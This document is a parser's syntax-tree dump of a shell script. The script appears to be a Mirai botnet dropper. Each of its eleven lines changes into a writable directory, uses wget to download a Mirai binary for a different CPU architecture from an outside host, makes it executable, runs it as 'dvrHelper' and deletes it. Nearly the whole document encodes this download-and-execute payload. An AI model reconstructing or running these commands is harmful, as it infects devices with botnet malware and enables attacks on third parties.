ListNode(lineno=2, pos=(13, 167), parts=[
  CommandNode(lineno=2, pos=(13, 20), parts=[
    WordNode(lineno=2, pos=(13, 15), word='cd'),
    WordNode(lineno=2, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(21, 23)),
  CommandNode(lineno=2, pos=(24, 35), parts=[
    WordNode(lineno=2, pos=(24, 26), word='cd'),
    WordNode(lineno=2, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(36, 38)),
  CommandNode(lineno=2, pos=(39, 46), parts=[
    WordNode(lineno=2, pos=(39, 41), word='cd'),
    WordNode(lineno=2, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(47, 49)),
  CommandNode(lineno=2, pos=(50, 58), parts=[
    WordNode(lineno=2, pos=(50, 52), word='cd'),
    WordNode(lineno=2, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(59, 61)),
  CommandNode(lineno=2, pos=(62, 66), parts=[
    WordNode(lineno=2, pos=(62, 64), word='cd'),
    WordNode(lineno=2, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(66, 67)),
  CommandNode(lineno=2, pos=(68, 115), parts=[
    WordNode(lineno=2, pos=(68, 72), word='wget'),
    WordNode(lineno=2, pos=(73, 102), word='http://kysfag.3x.ro/mirai.arm'),
    WordNode(lineno=2, pos=(103, 105), word='-O'),
    WordNode(lineno=2, pos=(106, 115), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(115, 116)),
  CommandNode(lineno=2, pos=(117, 135), parts=[
    WordNode(lineno=2, pos=(117, 122), word='chmod'),
    WordNode(lineno=2, pos=(123, 125), word='+x'),
    WordNode(lineno=2, pos=(126, 135), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(135, 136)),
  CommandNode(lineno=2, pos=(137, 148), parts=[
    WordNode(lineno=2, pos=(137, 148), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 167), parts=[
    WordNode(lineno=2, pos=(150, 152), word='rm'),
    WordNode(lineno=2, pos=(153, 156), word='-rf'),
    WordNode(lineno=2, pos=(157, 167), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=3, pos=(168, 323), parts=[
  CommandNode(lineno=3, pos=(168, 175), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 175), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(176, 178)),
  CommandNode(lineno=3, pos=(179, 190), parts=[
    WordNode(lineno=3, pos=(179, 181), word='cd'),
    WordNode(lineno=3, pos=(182, 190), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(191, 193)),
  CommandNode(lineno=3, pos=(194, 201), parts=[
    WordNode(lineno=3, pos=(194, 196), word='cd'),
    WordNode(lineno=3, pos=(197, 201), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(202, 204)),
  CommandNode(lineno=3, pos=(205, 213), parts=[
    WordNode(lineno=3, pos=(205, 207), word='cd'),
    WordNode(lineno=3, pos=(208, 213), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(214, 216)),
  CommandNode(lineno=3, pos=(217, 221), parts=[
    WordNode(lineno=3, pos=(217, 219), word='cd'),
    WordNode(lineno=3, pos=(220, 221), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(221, 222)),
  CommandNode(lineno=3, pos=(223, 271), parts=[
    WordNode(lineno=3, pos=(223, 227), word='wget'),
    WordNode(lineno=3, pos=(228, 258), word='http://kysfag.3x.ro/mirai.m68k'),
    WordNode(lineno=3, pos=(259, 261), word='-O'),
    WordNode(lineno=3, pos=(262, 271), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(271, 272)),
  CommandNode(lineno=3, pos=(273, 291), parts=[
    WordNode(lineno=3, pos=(273, 278), word='chmod'),
    WordNode(lineno=3, pos=(279, 281), word='+x'),
    WordNode(lineno=3, pos=(282, 291), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(291, 292)),
  CommandNode(lineno=3, pos=(293, 304), parts=[
    WordNode(lineno=3, pos=(293, 304), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(304, 305)),
  CommandNode(lineno=3, pos=(306, 323), parts=[
    WordNode(lineno=3, pos=(306, 308), word='rm'),
    WordNode(lineno=3, pos=(309, 312), word='-rf'),
    WordNode(lineno=3, pos=(313, 323), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=4, pos=(324, 479), parts=[
  CommandNode(lineno=4, pos=(324, 331), parts=[
    WordNode(lineno=4, pos=(324, 326), word='cd'),
    WordNode(lineno=4, pos=(327, 331), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(332, 334)),
  CommandNode(lineno=4, pos=(335, 346), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 346), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(347, 349)),
  CommandNode(lineno=4, pos=(350, 357), parts=[
    WordNode(lineno=4, pos=(350, 352), word='cd'),
    WordNode(lineno=4, pos=(353, 357), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(358, 360)),
  CommandNode(lineno=4, pos=(361, 369), parts=[
    WordNode(lineno=4, pos=(361, 363), word='cd'),
    WordNode(lineno=4, pos=(364, 369), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(370, 372)),
  CommandNode(lineno=4, pos=(373, 377), parts=[
    WordNode(lineno=4, pos=(373, 375), word='cd'),
    WordNode(lineno=4, pos=(376, 377), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(377, 378)),
  CommandNode(lineno=4, pos=(379, 427), parts=[
    WordNode(lineno=4, pos=(379, 383), word='wget'),
    WordNode(lineno=4, pos=(384, 414), word='http://kysfag.3x.ro/mirai.mips'),
    WordNode(lineno=4, pos=(415, 417), word='-O'),
    WordNode(lineno=4, pos=(418, 427), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(427, 428)),
  CommandNode(lineno=4, pos=(429, 447), parts=[
    WordNode(lineno=4, pos=(429, 434), word='chmod'),
    WordNode(lineno=4, pos=(435, 437), word='+x'),
    WordNode(lineno=4, pos=(438, 447), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(447, 448)),
  CommandNode(lineno=4, pos=(449, 460), parts=[
    WordNode(lineno=4, pos=(449, 460), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(460, 461)),
  CommandNode(lineno=4, pos=(462, 479), parts=[
    WordNode(lineno=4, pos=(462, 464), word='rm'),
    WordNode(lineno=4, pos=(465, 468), word='-rf'),
    WordNode(lineno=4, pos=(469, 479), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=5, pos=(480, 635), parts=[
  CommandNode(lineno=5, pos=(480, 487), parts=[
    WordNode(lineno=5, pos=(480, 482), word='cd'),
    WordNode(lineno=5, pos=(483, 487), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(488, 490)),
  CommandNode(lineno=5, pos=(491, 502), parts=[
    WordNode(lineno=5, pos=(491, 493), word='cd'),
    WordNode(lineno=5, pos=(494, 502), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(503, 505)),
  CommandNode(lineno=5, pos=(506, 513), parts=[
    WordNode(lineno=5, pos=(506, 508), word='cd'),
    WordNode(lineno=5, pos=(509, 513), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(514, 516)),
  CommandNode(lineno=5, pos=(517, 525), parts=[
    WordNode(lineno=5, pos=(517, 519), word='cd'),
    WordNode(lineno=5, pos=(520, 525), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(526, 528)),
  CommandNode(lineno=5, pos=(529, 533), parts=[
    WordNode(lineno=5, pos=(529, 531), word='cd'),
    WordNode(lineno=5, pos=(532, 533), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(533, 534)),
  CommandNode(lineno=5, pos=(535, 583), parts=[
    WordNode(lineno=5, pos=(535, 539), word='wget'),
    WordNode(lineno=5, pos=(540, 570), word='http://kysfag.3x.ro/mirai.mpsl'),
    WordNode(lineno=5, pos=(571, 573), word='-O'),
    WordNode(lineno=5, pos=(574, 583), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(583, 584)),
  CommandNode(lineno=5, pos=(585, 603), parts=[
    WordNode(lineno=5, pos=(585, 590), word='chmod'),
    WordNode(lineno=5, pos=(591, 593), word='+x'),
    WordNode(lineno=5, pos=(594, 603), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(603, 604)),
  CommandNode(lineno=5, pos=(605, 616), parts=[
    WordNode(lineno=5, pos=(605, 616), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(616, 617)),
  CommandNode(lineno=5, pos=(618, 635), parts=[
    WordNode(lineno=5, pos=(618, 620), word='rm'),
    WordNode(lineno=5, pos=(621, 624), word='-rf'),
    WordNode(lineno=5, pos=(625, 635), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=6, pos=(636, 790), parts=[
  CommandNode(lineno=6, pos=(636, 643), parts=[
    WordNode(lineno=6, pos=(636, 638), word='cd'),
    WordNode(lineno=6, pos=(639, 643), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(644, 646)),
  CommandNode(lineno=6, pos=(647, 658), parts=[
    WordNode(lineno=6, pos=(647, 649), word='cd'),
    WordNode(lineno=6, pos=(650, 658), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(659, 661)),
  CommandNode(lineno=6, pos=(662, 669), parts=[
    WordNode(lineno=6, pos=(662, 664), word='cd'),
    WordNode(lineno=6, pos=(665, 669), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(670, 672)),
  CommandNode(lineno=6, pos=(673, 681), parts=[
    WordNode(lineno=6, pos=(673, 675), word='cd'),
    WordNode(lineno=6, pos=(676, 681), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(682, 684)),
  CommandNode(lineno=6, pos=(685, 689), parts=[
    WordNode(lineno=6, pos=(685, 687), word='cd'),
    WordNode(lineno=6, pos=(688, 689), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(689, 690)),
  CommandNode(lineno=6, pos=(691, 738), parts=[
    WordNode(lineno=6, pos=(691, 695), word='wget'),
    WordNode(lineno=6, pos=(696, 725), word='http://kysfag.3x.ro/mirai.x86'),
    WordNode(lineno=6, pos=(726, 728), word='-O'),
    WordNode(lineno=6, pos=(729, 738), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(738, 739)),
  CommandNode(lineno=6, pos=(740, 758), parts=[
    WordNode(lineno=6, pos=(740, 745), word='chmod'),
    WordNode(lineno=6, pos=(746, 748), word='+x'),
    WordNode(lineno=6, pos=(749, 758), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(758, 759)),
  CommandNode(lineno=6, pos=(760, 771), parts=[
    WordNode(lineno=6, pos=(760, 771), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(771, 772)),
  CommandNode(lineno=6, pos=(773, 790), parts=[
    WordNode(lineno=6, pos=(773, 775), word='rm'),
    WordNode(lineno=6, pos=(776, 779), word='-rf'),
    WordNode(lineno=6, pos=(780, 790), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=7, pos=(791, 945), parts=[
  CommandNode(lineno=7, pos=(791, 798), parts=[
    WordNode(lineno=7, pos=(791, 793), word='cd'),
    WordNode(lineno=7, pos=(794, 798), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(799, 801)),
  CommandNode(lineno=7, pos=(802, 813), parts=[
    WordNode(lineno=7, pos=(802, 804), word='cd'),
    WordNode(lineno=7, pos=(805, 813), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(814, 816)),
  CommandNode(lineno=7, pos=(817, 824), parts=[
    WordNode(lineno=7, pos=(817, 819), word='cd'),
    WordNode(lineno=7, pos=(820, 824), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(825, 827)),
  CommandNode(lineno=7, pos=(828, 836), parts=[
    WordNode(lineno=7, pos=(828, 830), word='cd'),
    WordNode(lineno=7, pos=(831, 836), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(837, 839)),
  CommandNode(lineno=7, pos=(840, 844), parts=[
    WordNode(lineno=7, pos=(840, 842), word='cd'),
    WordNode(lineno=7, pos=(843, 844), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(844, 845)),
  CommandNode(lineno=7, pos=(846, 893), parts=[
    WordNode(lineno=7, pos=(846, 850), word='wget'),
    WordNode(lineno=7, pos=(851, 880), word='http://kysfag.3x.ro/mirai.spc'),
    WordNode(lineno=7, pos=(881, 883), word='-O'),
    WordNode(lineno=7, pos=(884, 893), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(893, 894)),
  CommandNode(lineno=7, pos=(895, 913), parts=[
    WordNode(lineno=7, pos=(895, 900), word='chmod'),
    WordNode(lineno=7, pos=(901, 903), word='+x'),
    WordNode(lineno=7, pos=(904, 913), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(913, 914)),
  CommandNode(lineno=7, pos=(915, 926), parts=[
    WordNode(lineno=7, pos=(915, 926), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(926, 927)),
  CommandNode(lineno=7, pos=(928, 945), parts=[
    WordNode(lineno=7, pos=(928, 930), word='rm'),
    WordNode(lineno=7, pos=(931, 934), word='-rf'),
    WordNode(lineno=7, pos=(935, 945), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=8, pos=(946, 1101), parts=[
  CommandNode(lineno=8, pos=(946, 953), parts=[
    WordNode(lineno=8, pos=(946, 948), word='cd'),
    WordNode(lineno=8, pos=(949, 953), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(954, 956)),
  CommandNode(lineno=8, pos=(957, 968), parts=[
    WordNode(lineno=8, pos=(957, 959), word='cd'),
    WordNode(lineno=8, pos=(960, 968), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(969, 971)),
  CommandNode(lineno=8, pos=(972, 979), parts=[
    WordNode(lineno=8, pos=(972, 974), word='cd'),
    WordNode(lineno=8, pos=(975, 979), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(980, 982)),
  CommandNode(lineno=8, pos=(983, 991), parts=[
    WordNode(lineno=8, pos=(983, 985), word='cd'),
    WordNode(lineno=8, pos=(986, 991), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(992, 994)),
  CommandNode(lineno=8, pos=(995, 999), parts=[
    WordNode(lineno=8, pos=(995, 997), word='cd'),
    WordNode(lineno=8, pos=(998, 999), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(999, 1000)),
  CommandNode(lineno=8, pos=(1001, 1049), parts=[
    WordNode(lineno=8, pos=(1001, 1005), word='wget'),
    WordNode(lineno=8, pos=(1006, 1036), word='http://kysfag.3x.ro/mirai.arm7'),
    WordNode(lineno=8, pos=(1037, 1039), word='-O'),
    WordNode(lineno=8, pos=(1040, 1049), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1049, 1050)),
  CommandNode(lineno=8, pos=(1051, 1069), parts=[
    WordNode(lineno=8, pos=(1051, 1056), word='chmod'),
    WordNode(lineno=8, pos=(1057, 1059), word='+x'),
    WordNode(lineno=8, pos=(1060, 1069), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1069, 1070)),
  CommandNode(lineno=8, pos=(1071, 1082), parts=[
    WordNode(lineno=8, pos=(1071, 1082), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1082, 1083)),
  CommandNode(lineno=8, pos=(1084, 1101), parts=[
    WordNode(lineno=8, pos=(1084, 1086), word='rm'),
    WordNode(lineno=8, pos=(1087, 1090), word='-rf'),
    WordNode(lineno=8, pos=(1091, 1101), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=9, pos=(1102, 1258), parts=[
  CommandNode(lineno=9, pos=(1102, 1109), parts=[
    WordNode(lineno=9, pos=(1102, 1104), word='cd'),
    WordNode(lineno=9, pos=(1105, 1109), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1110, 1112)),
  CommandNode(lineno=9, pos=(1113, 1124), parts=[
    WordNode(lineno=9, pos=(1113, 1115), word='cd'),
    WordNode(lineno=9, pos=(1116, 1124), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1125, 1127)),
  CommandNode(lineno=9, pos=(1128, 1135), parts=[
    WordNode(lineno=9, pos=(1128, 1130), word='cd'),
    WordNode(lineno=9, pos=(1131, 1135), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1136, 1138)),
  CommandNode(lineno=9, pos=(1139, 1147), parts=[
    WordNode(lineno=9, pos=(1139, 1141), word='cd'),
    WordNode(lineno=9, pos=(1142, 1147), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1148, 1150)),
  CommandNode(lineno=9, pos=(1151, 1155), parts=[
    WordNode(lineno=9, pos=(1151, 1153), word='cd'),
    WordNode(lineno=9, pos=(1154, 1155), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1155, 1156)),
  CommandNode(lineno=9, pos=(1157, 1206), parts=[
    WordNode(lineno=9, pos=(1157, 1161), word='wget'),
    WordNode(lineno=9, pos=(1162, 1193), word='http://kysfag.3x.ro/mirai.arm5n'),
    WordNode(lineno=9, pos=(1194, 1196), word='-O'),
    WordNode(lineno=9, pos=(1197, 1206), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1206, 1207)),
  CommandNode(lineno=9, pos=(1208, 1226), parts=[
    WordNode(lineno=9, pos=(1208, 1213), word='chmod'),
    WordNode(lineno=9, pos=(1214, 1216), word='+x'),
    WordNode(lineno=9, pos=(1217, 1226), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1226, 1227)),
  CommandNode(lineno=9, pos=(1228, 1239), parts=[
    WordNode(lineno=9, pos=(1228, 1239), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1239, 1240)),
  CommandNode(lineno=9, pos=(1241, 1258), parts=[
    WordNode(lineno=9, pos=(1241, 1243), word='rm'),
    WordNode(lineno=9, pos=(1244, 1247), word='-rf'),
    WordNode(lineno=9, pos=(1248, 1258), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=10, pos=(1259, 1413), parts=[
  CommandNode(lineno=10, pos=(1259, 1266), parts=[
    WordNode(lineno=10, pos=(1259, 1261), word='cd'),
    WordNode(lineno=10, pos=(1262, 1266), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1267, 1269)),
  CommandNode(lineno=10, pos=(1270, 1281), parts=[
    WordNode(lineno=10, pos=(1270, 1272), word='cd'),
    WordNode(lineno=10, pos=(1273, 1281), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1282, 1284)),
  CommandNode(lineno=10, pos=(1285, 1292), parts=[
    WordNode(lineno=10, pos=(1285, 1287), word='cd'),
    WordNode(lineno=10, pos=(1288, 1292), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1293, 1295)),
  CommandNode(lineno=10, pos=(1296, 1304), parts=[
    WordNode(lineno=10, pos=(1296, 1298), word='cd'),
    WordNode(lineno=10, pos=(1299, 1304), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1305, 1307)),
  CommandNode(lineno=10, pos=(1308, 1312), parts=[
    WordNode(lineno=10, pos=(1308, 1310), word='cd'),
    WordNode(lineno=10, pos=(1311, 1312), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1312, 1313)),
  CommandNode(lineno=10, pos=(1314, 1361), parts=[
    WordNode(lineno=10, pos=(1314, 1318), word='wget'),
    WordNode(lineno=10, pos=(1319, 1348), word='http://kysfag.3x.ro/mirai.arm'),
    WordNode(lineno=10, pos=(1349, 1351), word='-O'),
    WordNode(lineno=10, pos=(1352, 1361), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1361, 1362)),
  CommandNode(lineno=10, pos=(1363, 1381), parts=[
    WordNode(lineno=10, pos=(1363, 1368), word='chmod'),
    WordNode(lineno=10, pos=(1369, 1371), word='+x'),
    WordNode(lineno=10, pos=(1372, 1381), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1381, 1382)),
  CommandNode(lineno=10, pos=(1383, 1394), parts=[
    WordNode(lineno=10, pos=(1383, 1394), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1394, 1395)),
  CommandNode(lineno=10, pos=(1396, 1413), parts=[
    WordNode(lineno=10, pos=(1396, 1398), word='rm'),
    WordNode(lineno=10, pos=(1399, 1402), word='-rf'),
    WordNode(lineno=10, pos=(1403, 1413), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=11, pos=(1414, 1568), parts=[
  CommandNode(lineno=11, pos=(1414, 1421), parts=[
    WordNode(lineno=11, pos=(1414, 1416), word='cd'),
    WordNode(lineno=11, pos=(1417, 1421), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1422, 1424)),
  CommandNode(lineno=11, pos=(1425, 1436), parts=[
    WordNode(lineno=11, pos=(1425, 1427), word='cd'),
    WordNode(lineno=11, pos=(1428, 1436), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1437, 1439)),
  CommandNode(lineno=11, pos=(1440, 1447), parts=[
    WordNode(lineno=11, pos=(1440, 1442), word='cd'),
    WordNode(lineno=11, pos=(1443, 1447), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1448, 1450)),
  CommandNode(lineno=11, pos=(1451, 1459), parts=[
    WordNode(lineno=11, pos=(1451, 1453), word='cd'),
    WordNode(lineno=11, pos=(1454, 1459), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1460, 1462)),
  CommandNode(lineno=11, pos=(1463, 1467), parts=[
    WordNode(lineno=11, pos=(1463, 1465), word='cd'),
    WordNode(lineno=11, pos=(1466, 1467), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1467, 1468)),
  CommandNode(lineno=11, pos=(1469, 1516), parts=[
    WordNode(lineno=11, pos=(1469, 1473), word='wget'),
    WordNode(lineno=11, pos=(1474, 1503), word='http://kysfag.3x.ro/mirai.ppc'),
    WordNode(lineno=11, pos=(1504, 1506), word='-O'),
    WordNode(lineno=11, pos=(1507, 1516), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1516, 1517)),
  CommandNode(lineno=11, pos=(1518, 1536), parts=[
    WordNode(lineno=11, pos=(1518, 1523), word='chmod'),
    WordNode(lineno=11, pos=(1524, 1526), word='+x'),
    WordNode(lineno=11, pos=(1527, 1536), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1536, 1537)),
  CommandNode(lineno=11, pos=(1538, 1549), parts=[
    WordNode(lineno=11, pos=(1538, 1549), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1549, 1550)),
  CommandNode(lineno=11, pos=(1551, 1568), parts=[
    WordNode(lineno=11, pos=(1551, 1553), word='rm'),
    WordNode(lineno=11, pos=(1554, 1557), word='-rf'),
    WordNode(lineno=11, pos=(1558, 1568), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=12, pos=(1569, 1723), parts=[
  CommandNode(lineno=12, pos=(1569, 1576), parts=[
    WordNode(lineno=12, pos=(1569, 1571), word='cd'),
    WordNode(lineno=12, pos=(1572, 1576), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1577, 1579)),
  CommandNode(lineno=12, pos=(1580, 1591), parts=[
    WordNode(lineno=12, pos=(1580, 1582), word='cd'),
    WordNode(lineno=12, pos=(1583, 1591), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1592, 1594)),
  CommandNode(lineno=12, pos=(1595, 1602), parts=[
    WordNode(lineno=12, pos=(1595, 1597), word='cd'),
    WordNode(lineno=12, pos=(1598, 1602), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1603, 1605)),
  CommandNode(lineno=12, pos=(1606, 1614), parts=[
    WordNode(lineno=12, pos=(1606, 1608), word='cd'),
    WordNode(lineno=12, pos=(1609, 1614), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1615, 1617)),
  CommandNode(lineno=12, pos=(1618, 1622), parts=[
    WordNode(lineno=12, pos=(1618, 1620), word='cd'),
    WordNode(lineno=12, pos=(1621, 1622), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1622, 1623)),
  CommandNode(lineno=12, pos=(1624, 1671), parts=[
    WordNode(lineno=12, pos=(1624, 1628), word='wget'),
    WordNode(lineno=12, pos=(1629, 1658), word='http://kysfag.3x.ro/mirai.sh4'),
    WordNode(lineno=12, pos=(1659, 1661), word='-O'),
    WordNode(lineno=12, pos=(1662, 1671), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1671, 1672)),
  CommandNode(lineno=12, pos=(1673, 1691), parts=[
    WordNode(lineno=12, pos=(1673, 1678), word='chmod'),
    WordNode(lineno=12, pos=(1679, 1681), word='+x'),
    WordNode(lineno=12, pos=(1682, 1691), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1691, 1692)),
  CommandNode(lineno=12, pos=(1693, 1704), parts=[
    WordNode(lineno=12, pos=(1693, 1704), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1704, 1705)),
  CommandNode(lineno=12, pos=(1706, 1723), parts=[
    WordNode(lineno=12, pos=(1706, 1708), word='rm'),
    WordNode(lineno=12, pos=(1709, 1712), word='-rf'),
    WordNode(lineno=12, pos=(1713, 1723), word='dvrHelper\r'),
  ]),
])
CommandNode(lineno=13, pos=(1724, 1725), parts=[
  WordNode(lineno=13, pos=(1724, 1725), word='\r'),
])
